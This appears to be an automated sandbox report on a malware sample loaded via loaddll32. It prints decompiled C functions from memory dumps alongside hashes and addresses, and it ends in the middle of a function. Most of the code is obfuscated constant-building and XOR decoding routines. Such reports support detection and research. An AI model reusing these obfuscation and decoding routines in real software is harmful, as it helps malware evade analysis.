                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
                                                                                                                                                                            • Instruction ID: b5ac5ccb8c8eaed6c8e8e0d528770dfcb259e1cf9c1721610d6bf5bfe0a4996d
                                                                                                                                                                            • Opcode Fuzzy Hash: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
                                                                                                                                                                            • Instruction Fuzzy Hash: F55151721093029FC714DF21D88952FBBE1FBD4788F004A1CF69AA6220D7B59A09CF87
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                            			E02F6FF58(signed int __edx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				intOrPtr _t121;
                                                                                                                                                                            				signed int* _t123;
                                                                                                                                                                            				intOrPtr _t125;
                                                                                                                                                                            				signed int _t137;
                                                                                                                                                                            				signed int _t138;
                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                            				signed int _t140;
                                                                                                                                                                            
                                                                                                                                                                            				_v24 = 0xfb956e;
                                                                                                                                                                            				_v24 = _v24 ^ 0xccd4b1e5;
                                                                                                                                                                            				_v24 = _v24 << 2;
                                                                                                                                                                            				_v24 = _v24 ^ 0x30bd930f;
                                                                                                                                                                            				_v44 = 0xac147c;
                                                                                                                                                                            				_t137 = __edx;
                                                                                                                                                                            				_v44 = _v44 * 0x49;
                                                                                                                                                                            				_v44 = _v44 ^ 0x31196cd2;
                                                                                                                                                                            				_v8 = 0x40a8d3;
                                                                                                                                                                            				_v8 = _v8 | 0x3acc4d3b;
                                                                                                                                                                            				_v8 = _v8 << 3;
                                                                                                                                                                            				_v8 = _v8 >> 2;
                                                                                                                                                                            				_v8 = _v8 ^ 0x3596af33;
                                                                                                                                                                            				_v40 = 0x7a1af9;
                                                                                                                                                                            				_v40 = _v40 | 0x9e6699ed;
                                                                                                                                                                            				_v40 = _v40 ^ 0x9e79921f;
                                                                                                                                                                            				_v28 = 0x2e80d;
                                                                                                                                                                            				_v28 = _v28 | 0x96bed856;
                                                                                                                                                                            				_v28 = _v28 + 0x6398;
                                                                                                                                                                            				_v28 = _v28 ^ 0x96be47ad;
                                                                                                                                                                            				_v16 = 0x1a939;
                                                                                                                                                                            				_v16 = _v16 >> 0xb;
                                                                                                                                                                            				_v16 = _v16 + 0xffff851f;
                                                                                                                                                                            				_v16 = _v16 >> 0xc;
                                                                                                                                                                            				_v16 = _v16 ^ 0x0002802d;
                                                                                                                                                                            				_v12 = 0x8a82de;
                                                                                                                                                                            				_v12 = _v12 + 0xffff96d2;
                                                                                                                                                                            				_v12 = _v12 << 0xd;
                                                                                                                                                                            				_t138 = 0x7d;
                                                                                                                                                                            				_v12 = _v12 / _t138;
                                                                                                                                                                            				_v12 = _v12 ^ 0x00892f26;
                                                                                                                                                                            				_v48 = 0xf49a5c;
                                                                                                                                                                            				_v48 = _v48 + 0x7176;
                                                                                                                                                                            				_v48 = _v48 ^ 0x00fa98c0;
                                                                                                                                                                            				_v52 = 0x2df28f;
                                                                                                                                                                            				_t139 = 0x75;
                                                                                                                                                                            				_v52 = _v52 / _t139;
                                                                                                                                                                            				_v52 = _v52 ^ 0x0004ae50;
                                                                                                                                                                            				_v36 = 0xfa4daf;
                                                                                                                                                                            				_v36 = _v36 << 0xc;
                                                                                                                                                                            				_t140 = 0x6f;
                                                                                                                                                                            				_v36 = _v36 * 0x11;
                                                                                                                                                                            				_v36 = _v36 ^ 0xf2876c8f;
                                                                                                                                                                            				_v32 = 0x3a5591;
                                                                                                                                                                            				_v32 = _v32 >> 4;
                                                                                                                                                                            				_v32 = _v32 >> 0xa;
                                                                                                                                                                            				_v32 = _v32 ^ 0x00085aff;
                                                                                                                                                                            				_v20 = 0x5fc7f5;
                                                                                                                                                                            				_v20 = _v20 / _t140;
                                                                                                                                                                            				_v20 = _v20 << 0xc;
                                                                                                                                                                            				_v20 = _v20 >> 9;
                                                                                                                                                                            				_v20 = _v20 ^ 0x000581a9;
                                                                                                                                                                            				_push(_v40);
                                                                                                                                                                            				_push(_v8);
                                                                                                                                                                            				_push(_v44);
                                                                                                                                                                            				_t121 = E02F552B9(E02F6E1F8(_t123, _v24, _v20), _v28, _v16, _v12, _v48);
                                                                                                                                                                            				_t125 =  *0x2f7620c; // 0x0
                                                                                                                                                                            				 *((intOrPtr*)(_t125 + 0x14 + _t137 * 4)) = _t121;
                                                                                                                                                                            				return E02F6FECB(_t120, _v52, _v36, _v32, _v20);
                                                                                                                                                                            			}






















                                                                                                                                                                            0x02f6ff5e
                                                                                                                                                                            0x02f6ff65
                                                                                                                                                                            0x02f6ff6c
                                                                                                                                                                            0x02f6ff70
                                                                                                                                                                            0x02f6ff77
                                                                                                                                                                            0x02f6ff86
                                                                                                                                                                            0x02f6ff8a
                                                                                                                                                                            0x02f6ff8d
                                                                                                                                                                            0x02f6ff94
                                                                                                                                                                            0x02f6ff9b
                                                                                                                                                                            0x02f6ffa2
                                                                                                                                                                            0x02f6ffa6
                                                                                                                                                                            0x02f6ffaa
                                                                                                                                                                            0x02f6ffb1
                                                                                                                                                                            0x02f6ffb8
                                                                                                                                                                            0x02f6ffbf
                                                                                                                                                                            0x02f6ffc6
                                                                                                                                                                            0x02f6ffcd
                                                                                                                                                                            0x02f6ffd4
                                                                                                                                                                            0x02f6ffdb
                                                                                                                                                                            0x02f6ffe2
                                                                                                                                                                            0x02f6ffe9
                                                                                                                                                                            0x02f6ffed
                                                                                                                                                                            0x02f6fff4
                                                                                                                                                                            0x02f6fff8
                                                                                                                                                                            0x02f6ffff
                                                                                                                                                                            0x02f70006
                                                                                                                                                                            0x02f7000d
                                                                                                                                                                            0x02f70014
                                                                                                                                                                            0x02f70019
                                                                                                                                                                            0x02f7001e
                                                                                                                                                                            0x02f70025
                                                                                                                                                                            0x02f7002c
                                                                                                                                                                            0x02f70033
                                                                                                                                                                            0x02f7003a
                                                                                                                                                                            0x02f70044
                                                                                                                                                                            0x02f70049
                                                                                                                                                                            0x02f7004e
                                                                                                                                                                            0x02f70055
                                                                                                                                                                            0x02f7005c
                                                                                                                                                                            0x02f70064
                                                                                                                                                                            0x02f70065
                                                                                                                                                                            0x02f70068
                                                                                                                                                                            0x02f7006f
                                                                                                                                                                            0x02f70076
                                                                                                                                                                            0x02f7007a
                                                                                                                                                                            0x02f7007e
                                                                                                                                                                            0x02f70085
                                                                                                                                                                            0x02f70091
                                                                                                                                                                            0x02f70094
                                                                                                                                                                            0x02f70098
                                                                                                                                                                            0x02f7009c
                                                                                                                                                                            0x02f700a3
                                                                                                                                                                            0x02f700a6
                                                                                                                                                                            0x02f700a9
                                                                                                                                                                            0x02f700c4
                                                                                                                                                                            0x02f700c9
                                                                                                                                                                            0x02f700d2
                                                                                                                                                                            0x02f700ee

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a637bd4555ac4fafedc696ba2fed61836563f82f69af772a54e1e2e88810cad6
                                                                                                                                                                            • Instruction ID: 4f9bc13a558e126474554fdf7e4a5457adff8d8c90b60880b3273aeb51f34a4b
                                                                                                                                                                            • Opcode Fuzzy Hash: a637bd4555ac4fafedc696ba2fed61836563f82f69af772a54e1e2e88810cad6
                                                                                                                                                                            • Instruction Fuzzy Hash: EA41EE76D0122DEBCF08DFA5D94A4DEBFB2FB48314F108199D522B6220D3B90A59DF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                            			E02F64244(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                            				signed int* _t49;
                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                            				unsigned int* _t65;
                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                            				signed int _t68;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				unsigned int _t73;
                                                                                                                                                                            				unsigned int _t74;
                                                                                                                                                                            				unsigned int* _t77;
                                                                                                                                                                            				signed int* _t78;
                                                                                                                                                                            				signed int* _t79;
                                                                                                                                                                            				unsigned int _t81;
                                                                                                                                                                            				void* _t87;
                                                                                                                                                                            				void* _t89;
                                                                                                                                                                            				void* _t91;
                                                                                                                                                                            				void* _t93;
                                                                                                                                                                            
                                                                                                                                                                            				_push( *(_t91 + 0x2c));
                                                                                                                                                                            				_push( *(_t91 + 0x2c));
                                                                                                                                                                            				_push( *((intOrPtr*)(_t91 + 0x18)));
                                                                                                                                                                            				_t49 = E02F6FE29( *((intOrPtr*)(_t91 + 0x18)));
                                                                                                                                                                            				 *(_t91 + 0x28) = 0x3d5cbc;
                                                                                                                                                                            				_t5 =  &(_t49[1]); // 0x4
                                                                                                                                                                            				_t78 = _t5;
                                                                                                                                                                            				 *(_t91 + 0x28) =  *(_t91 + 0x28) | 0x6bd7da0a;
                                                                                                                                                                            				 *(_t91 + 0x28) =  *(_t91 + 0x28) ^ 0x6bf86309;
                                                                                                                                                                            				 *(_t91 + 0x38) = 0xea1d3d;
                                                                                                                                                                            				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0x10653bc0;
                                                                                                                                                                            				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0x4ee4a363;
                                                                                                                                                                            				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0xb4800a62;
                                                                                                                                                                            				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0xfe847125;
                                                                                                                                                                            				 *(_t91 + 0x24) = 0x45f786;
                                                                                                                                                                            				 *(_t91 + 0x24) =  *(_t91 + 0x24) | 0x34f761f8;
                                                                                                                                                                            				 *(_t91 + 0x24) =  *(_t91 + 0x24) ^ 0x34f5c6b3;
                                                                                                                                                                            				 *(_t91 + 0x20) = 0xc15f52;
                                                                                                                                                                            				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92036f91;
                                                                                                                                                                            				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92c36404;
                                                                                                                                                                            				_t68 =  *_t49;
                                                                                                                                                                            				_t79 =  &(_t78[1]);
                                                                                                                                                                            				_t51 =  *_t78 ^ _t68;
                                                                                                                                                                            				 *(_t91 + 0x2c) = _t68;
                                                                                                                                                                            				 *(_t91 + 0x30) = _t51;
                                                                                                                                                                            				_t31 = _t51 + 1; // 0x1
                                                                                                                                                                            				_t81 =  !=  ? (_t31 & 0xfffffffc) + 4 : _t31;
                                                                                                                                                                            				_t65 = E02F5C5D8(_t81);
                                                                                                                                                                            				_t93 = _t91 + 0x18;
                                                                                                                                                                            				 *(_t93 + 0x24) = _t65;
                                                                                                                                                                            				if(_t65 != 0) {
                                                                                                                                                                            					_t89 = 0;
                                                                                                                                                                            					_t77 = _t65;
                                                                                                                                                                            					_t87 =  >  ? 0 :  &(_t79[_t81 >> 2]) - _t79 + 3 >> 2;
                                                                                                                                                                            					if(_t87 != 0) {
                                                                                                                                                                            						_t66 =  *(_t93 + 0x1c);
                                                                                                                                                                            						do {
                                                                                                                                                                            							_t72 =  *_t79;
                                                                                                                                                                            							_t79 =  &(_t79[1]);
                                                                                                                                                                            							_t73 = _t72 ^ _t66;
                                                                                                                                                                            							 *_t77 = _t73;
                                                                                                                                                                            							_t77 =  &(_t77[1]);
                                                                                                                                                                            							_t74 = _t73 >> 0x10;
                                                                                                                                                                            							 *((char*)(_t77 - 3)) = _t73 >> 8;
                                                                                                                                                                            							 *(_t77 - 2) = _t74;
                                                                                                                                                                            							_t89 = _t89 + 1;
                                                                                                                                                                            							 *((char*)(_t77 - 1)) = _t74 >> 8;
                                                                                                                                                                            						} while (_t89 < _t87);
                                                                                                                                                                            						_t65 =  *(_t93 + 0x28);
                                                                                                                                                                            					}
                                                                                                                                                                            					 *((char*)(_t65 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t65;
                                                                                                                                                                            			}



















                                                                                                                                                                            0x02f6424e
                                                                                                                                                                            0x02f64252
                                                                                                                                                                            0x02f64256
                                                                                                                                                                            0x02f64259
                                                                                                                                                                            0x02f6425e
                                                                                                                                                                            0x02f64266
                                                                                                                                                                            0x02f64266
                                                                                                                                                                            0x02f64269
                                                                                                                                                                            0x02f64271
                                                                                                                                                                            0x02f64279
                                                                                                                                                                            0x02f64281
                                                                                                                                                                            0x02f64289
                                                                                                                                                                            0x02f64291
                                                                                                                                                                            0x02f64299
                                                                                                                                                                            0x02f642a1
                                                                                                                                                                            0x02f642a9
                                                                                                                                                                            0x02f642b1
                                                                                                                                                                            0x02f642b9
                                                                                                                                                                            0x02f642c1
                                                                                                                                                                            0x02f642c9
                                                                                                                                                                            0x02f642d1
                                                                                                                                                                            0x02f642d5
                                                                                                                                                                            0x02f642d8
                                                                                                                                                                            0x02f642da
                                                                                                                                                                            0x02f642de
                                                                                                                                                                            0x02f642e2
                                                                                                                                                                            0x02f642f2
                                                                                                                                                                            0x02f6430e
                                                                                                                                                                            0x02f64310
                                                                                                                                                                            0x02f64313
                                                                                                                                                                            0x02f64319
                                                                                                                                                                            0x02f64321
                                                                                                                                                                            0x02f64323
                                                                                                                                                                            0x02f64334
                                                                                                                                                                            0x02f64339
                                                                                                                                                                            0x02f6433b
                                                                                                                                                                            0x02f6433f
                                                                                                                                                                            0x02f6433f
                                                                                                                                                                            0x02f64341
                                                                                                                                                                            0x02f64344
                                                                                                                                                                            0x02f64346
                                                                                                                                                                            0x02f6434d
                                                                                                                                                                            0x02f64350
                                                                                                                                                                            0x02f64353
                                                                                                                                                                            0x02f64356
                                                                                                                                                                            0x02f6435c
                                                                                                                                                                            0x02f6435d
                                                                                                                                                                            0x02f64360
                                                                                                                                                                            0x02f64364
                                                                                                                                                                            0x02f64364
                                                                                                                                                                            0x02f6436d
                                                                                                                                                                            0x02f6436d
                                                                                                                                                                            0x02f64379

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
                                                                                                                                                                            • Instruction ID: b46d0c22902bcb82521e871f4bc678043722886554430b4ccec67e21a7972646
                                                                                                                                                                            • Opcode Fuzzy Hash: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
                                                                                                                                                                            • Instruction Fuzzy Hash: A1318B726083508FC315CF28D88545BFBE0FB88658F454B6DF98AA7221D774DA09CB96
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E02F63D85(void* __ecx, signed int* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				unsigned int _v12;
                                                                                                                                                                            				unsigned int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				void* _t46;
                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                            				signed int* _t63;
                                                                                                                                                                            				void* _t69;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				void* _t77;
                                                                                                                                                                            				unsigned int _t79;
                                                                                                                                                                            				void* _t81;
                                                                                                                                                                            				signed int* _t82;
                                                                                                                                                                            				signed int* _t83;
                                                                                                                                                                            				void* _t84;
                                                                                                                                                                            
                                                                                                                                                                            				_t63 = _a4;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_t63);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				E02F6FE29(_t46);
                                                                                                                                                                            				_v12 = 0xc30617;
                                                                                                                                                                            				_t82 =  &(__edx[1]);
                                                                                                                                                                            				_v12 = _v12 >> 8;
                                                                                                                                                                            				_v12 = _v12 ^ 0x0000aeb3;
                                                                                                                                                                            				_v20 = 0xf93b19;
                                                                                                                                                                            				_v20 = _v20 * 0x55;
                                                                                                                                                                            				_v20 = _v20 ^ 0x85e9037f;
                                                                                                                                                                            				_v20 = _v20 + 0xffff2dcc;
                                                                                                                                                                            				_v20 = _v20 ^ 0xd720e096;
                                                                                                                                                                            				_v16 = 0x37fa8e;
                                                                                                                                                                            				_v16 = _v16 ^ 0xc309fd15;
                                                                                                                                                                            				_v16 = _v16 >> 7;
                                                                                                                                                                            				_v16 = _v16 ^ 0x018ad68f;
                                                                                                                                                                            				_v24 = 0x2aa640;
                                                                                                                                                                            				_v24 = _v24 | 0xaf302e4c;
                                                                                                                                                                            				_v24 = _v24 << 2;
                                                                                                                                                                            				_v24 = _v24 | 0xa0025b53;
                                                                                                                                                                            				_v24 = _v24 ^ 0xbce807cd;
                                                                                                                                                                            				_t49 =  *__edx;
                                                                                                                                                                            				_t83 =  &(_t82[1]);
                                                                                                                                                                            				_t72 =  *_t82 ^ _t49;
                                                                                                                                                                            				_v8 = _t49;
                                                                                                                                                                            				_v4 = _t72;
                                                                                                                                                                            				_t79 =  !=  ? (_t72 & 0xfffffffc) + 4 : _t72;
                                                                                                                                                                            				_t84 = E02F5C5D8(_t79);
                                                                                                                                                                            				if(_t84 == 0) {
                                                                                                                                                                            					L6:
                                                                                                                                                                            					return _t84;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t81 = 0;
                                                                                                                                                                            				_t77 =  >  ? 0 :  &(_t83[_t79 >> 2]) - _t83 + 3 >> 2;
                                                                                                                                                                            				if(_t77 == 0) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					if(_t63 != 0) {
                                                                                                                                                                            						 *_t63 = _v4;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t69 = _t84 - _t83;
                                                                                                                                                                            				do {
                                                                                                                                                                            					_t81 = _t81 + 1;
                                                                                                                                                                            					 *(_t69 + _t83) =  *_t83 ^ _v8;
                                                                                                                                                                            					_t83 =  &(_t83[1]);
                                                                                                                                                                            				} while (_t81 < _t77);
                                                                                                                                                                            				goto L4;
                                                                                                                                                                            			}




















                                                                                                                                                                            0x02f63d89
                                                                                                                                                                            0x02f63d90
                                                                                                                                                                            0x02f63d94
                                                                                                                                                                            0x02f63d95
                                                                                                                                                                            0x02f63d97
                                                                                                                                                                            0x02f63d9c
                                                                                                                                                                            0x02f63da4
                                                                                                                                                                            0x02f63da7
                                                                                                                                                                            0x02f63dac
                                                                                                                                                                            0x02f63db4
                                                                                                                                                                            0x02f63dc1
                                                                                                                                                                            0x02f63dc5
                                                                                                                                                                            0x02f63dcd
                                                                                                                                                                            0x02f63dd5
                                                                                                                                                                            0x02f63ddd
                                                                                                                                                                            0x02f63de5
                                                                                                                                                                            0x02f63ded
                                                                                                                                                                            0x02f63df2
                                                                                                                                                                            0x02f63dfa
                                                                                                                                                                            0x02f63e02
                                                                                                                                                                            0x02f63e0a
                                                                                                                                                                            0x02f63e0f
                                                                                                                                                                            0x02f63e17
                                                                                                                                                                            0x02f63e1f
                                                                                                                                                                            0x02f63e23
                                                                                                                                                                            0x02f63e26
                                                                                                                                                                            0x02f63e28
                                                                                                                                                                            0x02f63e2e
                                                                                                                                                                            0x02f63e3f
                                                                                                                                                                            0x02f63e5b
                                                                                                                                                                            0x02f63e62
                                                                                                                                                                            0x02f63ea2
                                                                                                                                                                            0x02f63ea9
                                                                                                                                                                            0x02f63ea9
                                                                                                                                                                            0x02f63e6c
                                                                                                                                                                            0x02f63e7a
                                                                                                                                                                            0x02f63e7f
                                                                                                                                                                            0x02f63e96
                                                                                                                                                                            0x02f63e98
                                                                                                                                                                            0x02f63e9e
                                                                                                                                                                            0x02f63e9e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63e98
                                                                                                                                                                            0x02f63e83
                                                                                                                                                                            0x02f63e85
                                                                                                                                                                            0x02f63e8b
                                                                                                                                                                            0x02f63e8c
                                                                                                                                                                            0x02f63e8f
                                                                                                                                                                            0x02f63e92
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
                                                                                                                                                                            • Instruction ID: d8d94b945d8c7ba9e515700c7eb0e54fbacb979fa4c6ab5301f08ee850f2116a
                                                                                                                                                                            • Opcode Fuzzy Hash: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
                                                                                                                                                                            • Instruction Fuzzy Hash: AA3187726083008FC318DF69C98541BBBE2FBD8758F048B6DE589A3214DB78DA058B96
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                            			E02F5F0E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				void* _t69;
                                                                                                                                                                            				signed int _t83;
                                                                                                                                                                            				signed int _t84;
                                                                                                                                                                            				signed int _t85;
                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t69);
                                                                                                                                                                            				_v8 = 0x819b57;
                                                                                                                                                                            				_v8 = _v8 >> 0x10;
                                                                                                                                                                            				_t83 = 0x17;
                                                                                                                                                                            				_v8 = _v8 / _t83;
                                                                                                                                                                            				_v8 = _v8 >> 0xf;
                                                                                                                                                                            				_v8 = _v8 ^ 0x00008000;
                                                                                                                                                                            				_v24 = 0x7d8883;
                                                                                                                                                                            				_v24 = _v24 >> 0xd;
                                                                                                                                                                            				_v24 = _v24 + 0xffff5cfc;
                                                                                                                                                                            				_v24 = _v24 ^ 0xfff105d0;
                                                                                                                                                                            				_v16 = 0x4e701e;
                                                                                                                                                                            				_v16 = _v16 ^ 0xb2bd4297;
                                                                                                                                                                            				_t84 = 0x5b;
                                                                                                                                                                            				_v16 = _v16 / _t84;
                                                                                                                                                                            				_t85 = 0x7f;
                                                                                                                                                                            				_v16 = _v16 / _t85;
                                                                                                                                                                            				_v16 = _v16 ^ 0x000cfa43;
                                                                                                                                                                            				_v12 = 0xc80371;
                                                                                                                                                                            				_t86 = 0x37;
                                                                                                                                                                            				_v12 = _v12 / _t86;
                                                                                                                                                                            				_v12 = _v12 >> 1;
                                                                                                                                                                            				_t87 = 0x79;
                                                                                                                                                                            				_v12 = _v12 / _t87;
                                                                                                                                                                            				_v12 = _v12 ^ 0x0004b486;
                                                                                                                                                                            				_v20 = 0xa43314;
                                                                                                                                                                            				_v20 = _v20 << 3;
                                                                                                                                                                            				_v20 = _v20 + 0xa205;
                                                                                                                                                                            				_v20 = _v20 ^ 0x052abea0;
                                                                                                                                                                            				return E02F5F8A9(_v24, _v16, __edx, _v12, _v8, _v20);
                                                                                                                                                                            			}














                                                                                                                                                                            0x02f5f0f0
                                                                                                                                                                            0x02f5f0f5
                                                                                                                                                                            0x02f5f0f8
                                                                                                                                                                            0x02f5f0f9
                                                                                                                                                                            0x02f5f0fa
                                                                                                                                                                            0x02f5f0ff
                                                                                                                                                                            0x02f5f108
                                                                                                                                                                            0x02f5f111
                                                                                                                                                                            0x02f5f116
                                                                                                                                                                            0x02f5f11b
                                                                                                                                                                            0x02f5f11f
                                                                                                                                                                            0x02f5f126
                                                                                                                                                                            0x02f5f12d
                                                                                                                                                                            0x02f5f131
                                                                                                                                                                            0x02f5f138
                                                                                                                                                                            0x02f5f13f
                                                                                                                                                                            0x02f5f146
                                                                                                                                                                            0x02f5f150
                                                                                                                                                                            0x02f5f155
                                                                                                                                                                            0x02f5f15d
                                                                                                                                                                            0x02f5f162
                                                                                                                                                                            0x02f5f167
                                                                                                                                                                            0x02f5f16e
                                                                                                                                                                            0x02f5f178
                                                                                                                                                                            0x02f5f17d
                                                                                                                                                                            0x02f5f182
                                                                                                                                                                            0x02f5f188
                                                                                                                                                                            0x02f5f18b
                                                                                                                                                                            0x02f5f18e
                                                                                                                                                                            0x02f5f195
                                                                                                                                                                            0x02f5f19c
                                                                                                                                                                            0x02f5f1a0
                                                                                                                                                                            0x02f5f1a7
                                                                                                                                                                            0x02f5f1ca

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
                                                                                                                                                                            • Instruction ID: 7eefbe887815efdf95bef2fbef2499ee2a7a770423bf9c4ad552904852e27ca2
                                                                                                                                                                            • Opcode Fuzzy Hash: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
                                                                                                                                                                            • Instruction Fuzzy Hash: D7213776E00209EBDF08CFE5C9099DEBBB2EB54314F20C09AD514AB290D7B51B14DF80
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E02F6567B(void* __edx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                            				void* _t70;
                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                            				intOrPtr* _t82;
                                                                                                                                                                            				void* _t83;
                                                                                                                                                                            
                                                                                                                                                                            				_v16 = 0x3cd044;
                                                                                                                                                                            				_v16 = _v16 + 0x8a1e;
                                                                                                                                                                            				_t70 = __edx;
                                                                                                                                                                            				_t71 = 0x23;
                                                                                                                                                                            				_v16 = _v16 / _t71;
                                                                                                                                                                            				_v16 = _v16 ^ 0x000ceb59;
                                                                                                                                                                            				_v20 = 0x98fec3;
                                                                                                                                                                            				_v20 = _v20 + 0x117b;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00928bce;
                                                                                                                                                                            				_v12 = 0xc66557;
                                                                                                                                                                            				_v12 = _v12 | 0xbd5cb058;
                                                                                                                                                                            				_t72 = 0x6a;
                                                                                                                                                                            				_v12 = _v12 / _t72;
                                                                                                                                                                            				_v12 = _v12 * 0x5e;
